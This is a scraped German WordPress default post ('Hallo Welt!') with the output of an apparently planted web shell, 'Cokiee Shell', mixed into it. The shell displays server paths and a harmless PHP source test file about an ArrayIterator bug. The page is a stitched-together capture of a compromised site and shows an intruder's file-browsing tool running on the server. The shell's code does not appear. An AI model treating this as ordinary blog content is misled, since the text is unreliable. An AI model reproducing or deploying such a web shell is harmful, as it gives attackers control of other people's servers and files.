Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/spl/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/spl/tests/bug62616.phpt |
--TEST-- Bug #62616 (ArrayIterator::count() from IteratorIterator instance gives Segmentation fault) --FILE-- <?php $ai = new ArrayIterator(array(0,1)); var_dump($ai->count()); $ii = new IteratorIterator($ai); var_dump($ii->count()); ?> --EXPECTF-- int(2) int(2)
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare